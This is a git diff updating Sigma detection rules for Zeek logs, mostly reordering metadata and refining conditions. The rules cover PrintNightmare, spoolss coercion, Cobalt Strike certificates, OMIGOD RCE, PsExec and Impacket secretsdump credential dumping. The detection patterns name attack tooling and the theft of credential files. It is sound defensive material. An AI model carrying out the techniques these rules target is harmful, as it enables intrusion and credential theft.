-author: '@neu5ron (Nate Guagenti)' -date: 2021/08/23 references: - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29 - - https://github.com/zeek/zeek/blob/master/scripts/base/protocols/dce-rpc/consts.zeek + - https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 - https://github.com/corelight/CVE-2021-1675 - - https://github.com/SigmaHQ/sigma/blob/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml - https://old.zeek.org/zeekweek2019/slides/bzar.pdf - https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/ +author: '@neu5ron (Nate Guagenti)' +date: 2021/08/23 +modified: 2022/07/07 tags: - attack.execution - cve.2021.1678 @@ -32,9 +36,6 @@ detection: - 'RpcAddPrinterDriver' # "12345678-1234-abcd-ef00-0123456789ab",0x09 - 'RpcAsyncAddPrinterDriver' # "76f03f96-cdfd-44fc-a22c-64950a001209",0x27 condition: selection -falsepositives: - - Legitimate remote alteration of a printer driver. -level: medium fields: - id.orig_h - id.resp_h @@ -43,4 +44,6 @@ fields: - endpoint - named_pipe - uid -status: stable +falsepositives: + - Legitimate remote alteration of a printer driver. +level: medium diff --git a/src/main/resources/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml b/src/main/resources/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml index 59b8daad8..3e3c14fb1 100644 --- a/src/main/resources/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml +++ b/src/main/resources/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml @@ -1,23 +1,23 @@ title: SMB Spoolss Name Piped Usage id: bae2865c-5565-470d-b505-9496c87d0c30 +status: test description: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled. -status: experimental -author: OTR (Open Threat Research), @neu5ron references: - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1 - https://dirkjanm.io/a-different-way-of-abusing-zerologon/ - https://twitter.com/_dirkjan/status/1309214379003588608 +author: OTR (Open Threat Research), @neu5ron +date: 2018/11/28 +modified: 2022/10/09 tags: - attack.lateral_movement - attack.t1021.002 -date: 2018/11/28 -modified: 2021/08/23 logsource: product: zeek service: smb_files detection: selection: - path|endswith: IPC$ + path|endswith: 'IPC$' name: spoolss condition: selection falsepositives: diff --git a/src/main/resources/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml b/src/main/resources/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml index abcb28927..ff65bc439 100644 --- a/src/main/resources/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml +++ b/src/main/resources/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml @@ -1,22 +1,22 @@ title: Default Cobalt Strike Certificate id: 7100f7e3-92ce-4584-b7b7-01b40d3d4118 +status: test description: Detects the presence of default Cobalt Strike certificate in the HTTPS traffic -status: experimental +references: + - https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468 author: Bhabesh Raj date: 2021/06/23 -modified: 2021/08/24 -references: - - https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468 +modified: 2022/10/09 tags: - - attack.command_and_control - - attack.s0154 + - attack.command_and_control + - attack.s0154 logsource: - product: zeek - service: x509 + product: zeek + service: x509 detection: - selection: - certificate.serial: 8BB00EE - condition: selection + selection: + certificate.serial: 8BB00EE + condition: selection fields: - san.dns - certificate.subject diff --git a/src/main/resources/rules/network/zeek/zeek_dns_mining_pools.yml b/src/main/resources/rules/network/zeek/zeek_dns_mining_pools.yml index 87868b483..a715f2934 100644 --- a/src/main/resources/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/src/main/resources/rules/network/zeek/zeek_dns_mining_pools.yml @@ -1,19 +1,20 @@ title: DNS Events Related To Mining Pools id: bf74135c-18e8-4a72-a926-0e4f47888c19 +status: test description: Identifies clients that may be performing DNS lookups associated with common currency mining pools. -status: experimental references: - - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/ASimDNS/imDNS_Miners.yaml -date: 2021/08/19 -modified: 2021/08/23 + - https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml author: Saw Winn Naung, Azure-Sentinel, @neu5ron -level: low +date: 2021/08/19 +modified: 2022/07/07 +tags: + - attack.execution + - attack.t1569.002 + - attack.impact + - attack.t1496 logsource: service: dns product: zeek -tags: - - attack.t1569.002 - - attack.t1496 detection: selection: query|endswith: @@ -93,9 +94,7 @@ detection: - '0.0.0.0' exclude_rejected: rejected: 'true' - condition: selection and not (exclude_answers or exclude_rejected) -falsepositives: - - A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'. + condition: selection and not 1 of exclude_* fields: - id.orig_h - id.resp_h @@ -103,3 +102,6 @@ fields: - answers - qtype_name - rcode_name +falsepositives: + - A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'. +level: low diff --git a/src/main/resources/rules/network/zeek/zeek_dns_nkn.yml b/src/main/resources/rules/network/zeek/zeek_dns_nkn.yml index 35c1bc3d6..6e96c4e49 100644 --- a/src/main/resources/rules/network/zeek/zeek_dns_nkn.yml +++ b/src/main/resources/rules/network/zeek/zeek_dns_nkn.yml @@ -1,28 +1,28 @@ title: New Kind of Network (NKN) Detection id: fa7703d6-0ee8-4949-889c-48c84bc15b6f -status: experimental +status: test description: NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma> references: - - https://github.com/nknorg/nkn-sdk-go - - https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/ - - https://github.com/Maka8ka/NGLite -tags: - - attack.command_and_control + - https://github.com/nknorg/nkn-sdk-go + - https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/ + - https://github.com/Maka8ka/NGLite author: Michael Portera (@mportatoes) date: 2022/04/21 +tags: + - attack.command_and_control logsource: - product: zeek - service: dns + product: zeek + service: dns detection: - selection: - query|contains|all: - - 'seed' - - '.nkn.org' - condition: selection + selection: + query|contains|all: + - 'seed' + - '.nkn.org' + condition: selection fields: - id.orig_h - id.resp_h - answers falsepositives: - - Unknown + - Unknown level: low diff --git a/src/main/resources/rules/network/zeek/zeek_dns_susp_zbit_flag.yml b/src/main/resources/rules/network/zeek/zeek_dns_susp_zbit_flag.yml index 306a153b0..6f9485225 100644 --- a/src/main/resources/rules/network/zeek/zeek_dns_susp_zbit_flag.yml +++ b/src/main/resources/rules/network/zeek/zeek_dns_susp_zbit_flag.yml @@ -1,71 +1,56 @@ title: Suspicious DNS Z Flag Bit Set id: ede05abc-2c9e-4624-9944-9ff17fdc0bf5 -description: 'The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused). Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare. Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward. Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs' -status: experimental -date: 2021/05/04 -modified: 2022/02/24 +status: test +description: | + The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused). + Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare. + Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward. + Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering. + This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs' references: - - 'https://twitter.com/neu5ron/status/1346245602502443009' - - 'https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma' - - 'https://tools.ietf.org/html/rfc2929#section-2.1' - - 'https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS' + - https://twitter.com/neu5ron/status/1346245602502443009 + - https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma + - https://tools.ietf.org/html/rfc2929#section-2.1 + - https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS author: '@neu5ron, SOC Prime Team, Corelight' +date: 2021/05/04 +modified: 2022/11/29 tags: - - attack.t1095 - - attack.t1571 - - attack.command_and_control + - attack.t1095 + - attack.t1571 + - attack.command_and_control logsource: - product: zeek - service: dns + product: zeek + service: dns detection: - z_flag_unset: - Z: '0' - most_probable_valid_domain: - query|contains: '.' - exclude_tlds: - query|endswith: - - '.arpa' - - '.local' - - '.ultradns.net' - - '.twtrdns.net' - - '.azuredns-prd.info' - - '.azure-dns.com' - - '.azuredns-ff.info' - - '.azuredns-ff.org' - - '.azuregov-dns.org' - exclude_query_types: - qtype_name: - - 'NS' - - 'ns' - - 'MX' - - 'mx' - exclude_responses: - answers|endswith: '\\x00' - exclude_netbios: - id.resp_p: - - '137' - - '138' - - '139' - condition: not z_flag_unset and most_probable_valid_domain and not (exclude_tlds or exclude_query_types or exclude_responses or exclude_netbios) + z_flag_unset: + Z: 0 + most_probable_valid_domain: + query|contains: '.' + exclude_tlds: + query|endswith: + - '.arpa' + - '.local' + - '.ultradns.net' + - '.twtrdns.net' + - '.azuredns-prd.info' + - '.azure-dns.com' + - '.azuredns-ff.info' + - '.azuredns-ff.org' + - '.azuregov-dns.org' + exclude_query_types: + qtype_name: + - 'ns' + - 'mx' + exclude_responses: + answers|endswith: '\\x00' + exclude_netbios: + id.resp_p: + - 137 + - 138 + - 139 + condition: not z_flag_unset and most_probable_valid_domain and not (exclude_tlds or exclude_query_types or exclude_responses or exclude_netbios) falsepositives: - - 'Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.' - - 'If you work in a Public Sector then it may be good to exclude things like endswith ".edu", ".gov" and or ".mil"' + - 'Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.' + - 'If you work in a Public Sector then it may be good to exclude things like endswith ".edu", ".gov" and or ".mil"' level: medium -fields: - - ts - - id.orig_h - - id.orig_p - - id.resp_h - - id.resp_p - - proto - - qtype_name - - qtype - - query - - answers - - rcode - - rcode_name - - trans_id - - qtype - - ttl - - AA - - uid diff --git a/src/main/resources/rules/network/zeek/zeek_dns_torproxy.yml b/src/main/resources/rules/network/zeek/zeek_dns_torproxy.yml index a227bb586..82e7d3aba 100644 --- a/src/main/resources/rules/network/zeek/zeek_dns_torproxy.yml +++ b/src/main/resources/rules/network/zeek/zeek_dns_torproxy.yml @@ -1,17 +1,18 @@ title: DNS TOR Proxies id: a8322756-015c-42e7-afb1-436e85ed3ff5 +status: test description: Identifies IPs performing DNS lookups associated with common Tor proxies. -status: experimental references: - - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/ASimDNS/imDNS_TorProxies.yaml -date: 2021/08/15 + - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml author: Saw Winn Naung , Azure-Sentinel -level: medium +date: 2021/08/15 +modified: 2022/10/09 +tags: + - attack.exfiltration + - attack.t1048 logsource: service: dns product: zeek -tags: - - attack.t1048 detection: selection: query: @@ -50,3 +51,6 @@ detection: condition: selection fields: - clientip +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/network/zeek/zeek_http_executable_download_from_webdav.yml b/src/main/resources/rules/network/zeek/zeek_http_executable_download_from_webdav.yml index cb04ce559..40639e815 100644 --- a/src/main/resources/rules/network/zeek/zeek_http_executable_download_from_webdav.yml +++ b/src/main/resources/rules/network/zeek/zeek_http_executable_download_from_webdav.yml @@ -2,26 +2,26 @@ title: Executable from Webdav id: aac2fd97-bcba-491b-ad66-a6edf89c71bf status: test description: 'Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/' -author: 'SOC Prime, Adam Swan' references: - - http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html - - https://github.com/OTRF/detection-hackathon-apt29 + - http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html + - https://github.com/OTRF/detection-hackathon-apt29 +author: 'SOC Prime, Adam Swan' date: 2020/05/01 modified: 2021/11/27 +tags: + - attack.command_and_control + - attack.t1105 logsource: - product: zeek - service: http + product: zeek + service: http detection: - selection_webdav: - - c-useragent|contains: 'WebDAV' - - c-uri|contains: 'webdav' - selection_executable: - - resp_mime_types|contains: 'dosexec' - - c-uri|endswith: '.exe' - condition: selection_webdav and selection_executable + selection_webdav: + - c-useragent|contains: 'WebDAV' + - c-uri|contains: 'webdav' + selection_executable: + - resp_mime_types|contains: 'dosexec' + - c-uri|endswith: '.exe' + condition: selection_webdav and selection_executable falsepositives: - - Unknown + - Unknown level: medium -tags: - - attack.command_and_control - - attack.t1105 diff --git a/src/main/resources/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml b/src/main/resources/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml index f8f5fc693..58a2c26ec 100644 --- a/src/main/resources/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml +++ b/src/main/resources/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml @@ -1,12 +1,16 @@ title: OMIGOD HTTP No Authentication RCE id: ab6b1a39-a9ee-4ab4-b075-e83acf6e346b -description: Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request. -author: Nate Guagenti (neu5ron) -date: 2021/09/20 -modified: 2019/09/20 +status: stable +description: | + Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. + Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). + Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request. references: - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - https://twitter.com/neu5ron/status/1438987292971053057?s=20 +author: Nate Guagenti (neu5ron) +date: 2021/09/20 +modified: 2019/09/20 tags: - attack.privilege_escalation - attack.initial_access @@ -20,7 +24,7 @@ tags: logsource: product: zeek service: http - definition: Enable the builtin Zeek script that logs all HTTP header names by adding "@load policy/protocols/http/header-names" to your local.zeek config file. The script can be seen here for reference https://github.com/zeek/zeek/blob/master/scripts/policy/protocols/http/header-names.zeek + definition: Enable the builtin Zeek script that logs all HTTP header names by adding "@load policy/protocols/http/header-names" to your local.zeek config file. The script can be seen here for reference https://github.com/zeek/zeek/blob/d957f883df242ef159cfd846884e673addeea7a5/scripts/policy/protocols/http/header-names.zeek detection: selection: status_code: 200 @@ -30,17 +34,13 @@ detection: client_header_names|contains: 'AUTHORIZATION' too_small_http_client_body: request_body_len: 0 - #winrm_ports: + # winrm_ports: # id.resp_p: # - 5985 # - 5986 # - 1270 condition: selection and not auth_header and not too_small_http_client_body - #condition: selection and winrm_ports and not auth_header and not too_small_http_client_body # Enable this to only perform search on default WinRM ports, however those ports are sometimes changed and therefore this is disabled by default to give a broader coverage of this rule -falsepositives: - - Exploits that were attempted but unsuccessful. - - Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips. -level: high + # condition: selection and winrm_ports and not auth_header and not too_small_http_client_body # Enable this to only perform search on default WinRM ports, however those ports are sometimes changed and therefore this is disabled by default to give a broader coverage of this rule fields: - id.orig_h - id.resp_h @@ -51,4 +51,7 @@ fields: - request_body_len - response_body_len - user_agent -status: stable +falsepositives: + - Exploits that were attempted but unsuccessful. + - Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips. +level: high diff --git a/src/main/resources/rules/network/zeek/zeek_http_webdav_put_request.yml b/src/main/resources/rules/network/zeek/zeek_http_webdav_put_request.yml index ed3a28834..046a39c1d 100644 --- a/src/main/resources/rules/network/zeek/zeek_http_webdav_put_request.yml +++ b/src/main/resources/rules/network/zeek/zeek_http_webdav_put_request.yml @@ -2,27 +2,29 @@ title: WebDav Put Request id: 705072a5-bb6f-4ced-95b6-ecfa6602090b status: test description: A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration. -author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) references: - - https://github.com/OTRF/detection-hackathon-apt29/issues/17 + - https://github.com/OTRF/detection-hackathon-apt29/issues/17 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) date: 2020/05/02 -modified: 2021/11/27 +modified: 2024/03/13 +tags: + - attack.exfiltration + - attack.t1048.003 logsource: - product: zeek - service: http + product: zeek + service: http detection: - selection: - user_agent|contains: 'WebDAV' - method: 'PUT' - filter: - id.resp_h: - - 192.168.0.0/16 - - 172.16.0.0/12 - - 10.0.0.0/8 - condition: selection and not filter + selection: + user_agent|contains: 'WebDAV' + method: 'PUT' + filter: + id.resp_h|cidr: + - 10.0.0.0/8 + - 127.0.0.0/8 + - 172.16.0.0/12 + - 192.168.0.0/16 + - 169.254.0.0/16 + condition: selection and not filter falsepositives: - - Unknown + - Unknown level: low -tags: - - attack.exfiltration - - attack.t1048.003 diff --git a/src/main/resources/rules/network/zeek/zeek_rdp_public_listener.yml b/src/main/resources/rules/network/zeek/zeek_rdp_public_listener.yml index 8674e33f3..f48740e2c 100644 --- a/src/main/resources/rules/network/zeek/zeek_rdp_public_listener.yml +++ b/src/main/resources/rules/network/zeek/zeek_rdp_public_listener.yml @@ -1,47 +1,31 @@ title: Publicly Accessible RDP Service id: 1fc0809e-06bf-4de3-ad52-25e5263b7623 -status: experimental -description: Detects connections from routable IPs to an RDP listener - which is indicative of a publicly-accessible RDP service. +status: test +description: | + Detects connections from routable IPs to an RDP listener. Which is indicative of a publicly-accessible RDP service. references: - https://attack.mitre.org/techniques/T1021/001/ +author: Josh Brower @DefensiveDepth +date: 2020/08/22 +modified: 2024/03/13 tags: + - attack.lateral_movement - attack.t1021.001 -author: 'Josh Brower @DefensiveDepth' -date: 2020/08/22 -modified: 2021/11/14 logsource: product: zeek service: rdp detection: selection: - id.orig_h|startswith: - - '192.168.' - - '10.' - - '172.16.' - - '172.17.' - - '172.18.' - - '172.19.' - - '172.20.' - - '172.21.' - - '172.22.' - - '172.23.' - - '172.24.' - - '172.25.' - - '172.26.' - - '172.27.' - - '172.28.' - - '172.29.' - - '172.30.' - - '172.31.' - - 'fd' - - '2620:83:800f' - #approved_rdp: - #dst_ip: - #- x.x.x.x - condition: not selection #and not approved_rdp -fields: - - id.orig_h - - id.resp_h + id.orig_h|cidr: + - 10.0.0.0/8 + - 127.0.0.0/8 + - 172.16.0.0/12 + - 192.168.0.0/16 + - 169.254.0.0/16 + # approved_rdp: + # dst_ip: + # - x.x.x.x + condition: not selection # and not approved_rdp falsepositives: - Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet. level: high diff --git a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml index e0e7ef851..67139a7f6 100644 --- a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml +++ b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml @@ -1,27 +1,30 @@ title: Remote Task Creation via ATSVC Named Pipe - Zeek id: dde85b37-40cd-4a94-b00c-0b8794f956b5 +related: + - id: f6de6525-4509-495a-8a82-1f8b0ed73a00 + type: derived status: test description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe -author: 'Samir Bousseaden, @neu5rn' references: - - https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_atsvc_task.yml + - https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html +author: 'Samir Bousseaden, @neu5rn' date: 2020/04/03 -modified: 2021/11/27 +modified: 2022/12/27 +tags: + - attack.lateral_movement + - attack.persistence + - car.2013-05-004 + - car.2015-04-001 + - attack.t1053.002 logsource: - product: zeek - service: smb_files + product: zeek + service: smb_files detection: - selection: - path: \\\*\IPC$ - name: atsvc - #Accesses: '*WriteData*' - condition: selection + selection: + path: '\\\*\IPC$' + name: 'atsvc' + # Accesses: '*WriteData*' + condition: selection falsepositives: - - Unknown + - Unknown level: medium -tags: - - attack.lateral_movement - - attack.persistence - - car.2013-05-004 - - car.2015-04-001 - - attack.t1053.002 diff --git a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml index da432c695..2d9b24e4e 100644 --- a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml +++ b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml @@ -2,27 +2,27 @@ title: Possible Impacket SecretDump Remote Activity - Zeek id: 92dae1ed-1c9d-4eff-a567-33acbd95b00e status: test description: 'Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml' -author: 'Samir Bousseaden, @neu5ron' references: - - https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html + - https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html +author: 'Samir Bousseaden, @neu5ron' date: 2020/03/19 modified: 2021/11/27 +tags: + - attack.credential_access + - attack.t1003.002 + - attack.t1003.004 + - attack.t1003.003 logsource: - product: zeek - service: smb_files + product: zeek + service: smb_files detection: - selection: - path|contains|all: - - '\' - - 'ADMIN$' - name|contains: 'SYSTEM32\' - name|endswith: '.tmp' - condition: selection + selection: + path|contains|all: + - '\' + - 'ADMIN$' + name|contains: 'SYSTEM32\' + name|endswith: '.tmp' + condition: selection falsepositives: - - Unknown + - Unknown level: high -tags: - - attack.credential_access - - attack.t1003.002 - - attack.t1003.004 - - attack.t1003.003 diff --git a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml index 68c8c83f0..4f4173fc2 100644 --- a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml +++ b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml @@ -1,42 +1,42 @@ title: First Time Seen Remote Named Pipe - Zeek id: 021310d9-30a6-480a-84b7-eaa69aeb92bb +related: + - id: 52d8b0c6-53d6-439a-9e41-52ad442ad9ad + type: derived status: test description: This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes -author: 'Samir Bousseaden, @neu5ron' references: - - https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_lm_namedpipe.yml + - https://twitter.com/menasec1/status/1104489274387451904 +author: Samir Bousseaden, @neu5ron, Tim Shelton date: 2020/04/02 -modified: 2021/11/27 +modified: 2022/12/27 +tags: + - attack.lateral_movement + - attack.t1021.002 logsource: - product: zeek - service: smb_files + product: zeek + service: smb_files detection: - selection1: - path: \\\*\IPC$ - selection2: - path: \\\*\IPC$ - name: - - 'atsvc' - - 'samr' - - 'lsarpc' - - 'winreg' - - 'netlogon' - - 'srvsvc' - - 'protected_storage' - - 'wkssvc' - - 'browser' - - 'netdfs' - - 'svcctl' - - 'spoolss' - - 'ntsvcs' - - 'LSM_API_service' - - 'HydraLsPipe' - - 'TermSrv_API_service' - - 'MsFteWds' - condition: selection1 and not selection2 + selection: + path: '\\\\\*\\IPC$' # Looking for the string \\*\IPC$ + filter_keywords: + - 'samr' + - 'lsarpc' + - 'winreg' + - 'netlogon' + - 'srvsvc' + - 'protected_storage' + - 'wkssvc' + - 'browser' + - 'netdfs' + - 'svcctl' + - 'spoolss' + - 'ntsvcs' + - 'LSM_API_service' + - 'HydraLsPipe' + - 'TermSrv_API_service' + - 'MsFteWds' + condition: selection and not 1 of filter_* falsepositives: - - Update the excluded named pipe to filter out any newly observed legit named pipe + - Update the excluded named pipe to filter out any newly observed legit named pipe level: high -tags: - - attack.lateral_movement - - attack.t1021.002 diff --git a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml index bfa5b20b1..6cc11eafb 100644 --- a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml +++ b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml @@ -1,33 +1,33 @@ title: Suspicious PsExec Execution - Zeek id: f1b3a22a-45e6-4004-afb5-4291f9c21166 +related: + - id: c462f537-a1e3-41a6-b5fc-b2c2cef9bf82 + type: derived status: test description: detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one -author: 'Samir Bousseaden, @neu5ron' references: - - https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_psexec.yml + - https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html +author: Samir Bousseaden, @neu5ron, Tim Shelton date: 2020/04/02 -modified: 2021/11/27 +modified: 2022/12/27 +tags: + - attack.lateral_movement + - attack.t1021.002 logsource: - product: zeek - service: smb_files + product: zeek + service: smb_files detection: - selection1: - path|contains|all: - - '\\' - - '\IPC$' - name|endswith: - - '-stdin' - - '-stdout' - - '-stderr' - selection2: - name|contains|all: - - '\\' - - '\IPC$' - path|startswith: 'PSEXESVC' - condition: selection1 and not selection2 + selection: + path|contains|all: + - '\\' + - '\IPC$' + name|endswith: + - '-stdin' + - '-stdout' + - '-stderr' + filter: + name|startswith: 'PSEXESVC' + condition: selection and not filter falsepositives: - - Unknown + - Unknown level: high -tags: - - attack.lateral_movement - - attack.t1021.002 diff --git a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml index ff4e1bdb2..63b863352 100644 --- a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml +++ b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml @@ -1,39 +1,37 @@ title: Suspicious Access to Sensitive File Extensions - Zeek id: 286b47ed-f6fe-40b3-b3a8-35129acd43bc +related: + - id: 91c945bc-2ad1-4799-a591-4d00198a1215 + type: derived status: test description: Detects known sensitive file extensions via Zeek -author: 'Samir Bousseaden, @neu5ron' references: - - https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_raccess_sensitive_fext.yml + - Internal Research +author: Samir Bousseaden, @neu5ron date: 2020/04/02 modified: 2021/11/27 +tags: + - attack.collection logsource: - product: zeek - service: smb_files + product: zeek + service: smb_files detection: - selection: - name|endswith: - - '.pst' - - '.ost' - - '.msg' - - '.nst' - - '.oab' - - '.edb' - - '.nsf' - - '.bak' - - '.dmp' - - '.kirbi' - - '\groups.xml' - - '.rdp' - condition: selection -fields: - - ComputerName - - SubjectDomainName - - SubjectUserName - - RelativeTargetName + selection: + name|endswith: + - '.pst' + - '.ost' + - '.msg' + - '.nst' + - '.oab' + - '.edb' + - '.nsf' + - '.bak' + - '.dmp' + - '.kirbi' + - '\groups.xml' + - '.rdp' + condition: selection falsepositives: - - Help Desk operator doing backup or re-imaging end user machine or backup software - - Users working with these data types or exchanging message files + - Help Desk operator doing backup or re-imaging end user machine or backup software + - Users working with these data types or exchanging message files level: medium -tags: - - attack.collection diff --git a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml index ed9fc8db2..80e974747 100644 --- a/src/main/resources/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml +++ b/src/main/resources/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml @@ -1,32 +1,35 @@ title: Transferring Files with Credential Data via Network Shares - Zeek id: 2e69f167-47b5-4ae7-a390-47764529eff5 +related: + - id: 910ab938-668b-401b-b08c-b596e80fdca5 + type: similar status: test description: Transferring files with well-known filenames (sensitive files with 